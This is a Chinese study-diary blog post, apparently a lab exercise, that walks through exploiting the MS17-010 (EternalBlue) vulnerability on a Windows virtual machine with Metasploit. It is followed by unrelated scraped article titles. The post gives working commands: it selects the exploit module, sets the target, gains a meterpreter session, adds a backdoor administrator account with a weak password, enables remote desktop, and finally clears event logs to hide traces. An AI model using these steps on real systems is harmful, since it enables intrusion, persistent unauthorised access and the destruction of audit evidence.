一、vm虚拟机构建靶机实现互通

两个虚拟机都用NAT转换地址,设置DHCP分配IP,保证两台虚拟机和物理机在一个网段

二、kali上安装msf工具

apt-get install msf

三、msf工具使用步骤

攻击前记得先ping一下看是否能ping通

1、msfconsole打开msf工具

show targets (用于查看可攻击的系统)

2、search ms17-010 搜索漏洞可攻击的模块

auxiliary是用来辅助的 exploit开头的是用来直接攻击的(个人理解)

3、use 0(可以直接输序号也可以输入名字)

4、show options 查看所需配置

只需看reauired中是yes的配置就行

5、set  rhosts 靶机IP  (端口什么的自己设置命令都一样)

6、配置完成后直接 run 开始攻击

需要注意的是如果靶机开了防火墙,或者下载了补丁可能会显示不成功

攻击成功后会显示meterpreter

我们进来后第一步就先提权,输入:getuid(拿到“SYSTEM ”权限)

7、接下来就可以进行各种操作了

查看系统信息 sysinfo

screenshot可以截图,结果去路径下就可以找到

反弹Shell

反弹shell后就可以创建一个用户

net user gg 1234 /add(用户名为gg 密码1234)

net localgroup administrators gg /add (将新建的普通用户设置为管理员权限)

net user(查看是否设置成功)

开启远程桌面:meterpreter > run post/windows/manage/enable_rdp

然后重新开一个终端建立远程连接用新建的账户登录

注意!!!记得结束后清除日志 clearev

学习日记1:用msf工具利用永恒之蓝漏洞攻击靶机相关推荐

  1. kali使用msf 通过ms17_010_eternalblue(永恒之蓝)漏洞攻击win7测试 及乱码问题解决

    两台Vmware虚拟机: Kali Win7 64位: (主机)kali的ip是 192.168.0.119 (靶机)win7的ip是192.168.0.109 使用nmap端口扫描工具,扫描一下目标 ...

  2. Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)

    1.Metasploit 渗透测试框架介绍 1.基础库:metasploit 基础库文件位于源码根目录路径下的 libraries 目录中,包括Rex,framework-core 和 framewo ...

  3. kali 利用msf通过win7永恒之蓝漏洞获取权限

    kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应 ...

  4. MSF之ms17-010永恒之蓝漏洞利用

    MSF之ms17-010永恒之蓝漏洞利用 准备 扫描漏洞 漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali ...

  5. 利用永恒之蓝漏洞+修复方法(MS17-010)

    文章目录 利用永恒之蓝漏洞+修复方法(MS17-010) 1.环境 2.信息收集 3.使用MSF的永恒之蓝模块 4.使用ms17_010模块,对靶机进行扫描 5.1使用ms17_010模块,对靶机进行 ...

  6. 经典利用永恒之蓝漏洞对Windows操作系统进行攻击

    利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...

  7. msf之ms17-010永恒之蓝漏洞

    ** 文章主旨: ** 1.熟悉msf的基本用法. 2.熟悉一些渗透中会用到基本的windows命令. 3.复现永恒之蓝漏洞. 漏洞原理: 通过向Windows服务器的SMBv1服务发送精心构造的命令 ...

  8. 蠕虫病毒利用永恒之蓝漏洞传播 单位局域网受威胁最大

    一. 概述 日前,火绒安全团队通过"火绒威胁情报系统"发现蠕虫病毒"Worm/Sharp"正在全网传播,其中在政府.企业.学校.医院等单位的局域网具有非常强的传 ...

  9. MSF之利用永恒之蓝

    永恒之蓝: 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机.甚至于2017年5月12日, ...

最新文章

  1. 小程序 url 对象转字符串编码传参 url 字符串转对象解码接收参数
  2. 【C 语言】C 字符串 ( 表示方法 | strcpy | strcat | strlen | strcmp )
  3. ArrayList为何线程不安全,如何解决
  4. void GPIO_Init(GPIO_TypeDef* GPIOx, GPIO_InitTypeDef* GPIO_InitStruct)的一些理解
  5. kubernetes1.8.4 安装指南 -- 6. 安装kubernetes master
  6. oracle 群集 无存储,存储的群集注意事项 - Oracle® ZFS Storage Appliance 管理指南
  7. npm dev run 报错
  8. 计算机巧用剪纸做画册教案,大班绘画剪纸制作的教案总结
  9. Linux中Tomcat 服务的搭建
  10. 游戏“外挂”?—— AI生成游戏最强攻略
  11. 开放域文本分类技术思考
  12. paip.微信菜单直接跳转url和获取openid流程总结
  13. python的类变量和成员变量用法_python中类变量和成员变量、局部变量总结
  14. 8、二叉树的下一个节点(Python)
  15. 存储过程实例(用存储过程获取单张表的总记录数)
  16. android客户端跟服务器交换数据,Android客户端和服务器端数据交互的第一种方法...
  17. HTML引用另一个js文件的方法,在另一个js文件中调用一个javascript函数
  18. html怎么添加banner图,如何在wordpress首页中添加banner图片?
  19. 亲民地理38期-江西极顶武功山(上)
  20. 网络知识汇总(1)-朗文和牛津英语词典网址

热门文章

  1. ChatGPT 团队有几个人?
  2. 【项目】费曼技巧,终极学习法
  3. Kraljic采购定位模型
  4. office卸载重新安装,并安装mathtype7数学编辑公式
  5. Python | Flask 解决跨域问题
  6. 企业网站怎么制作?企业网站制作,只需记住这8个步骤
  7. App中所有页面添加水印(支持单行和多行)
  8. 终于稀里糊涂完成了模仿天猫整站ssm
  9. EQS(场景查询系统)
  10. 操作系统实验指导书(完整版)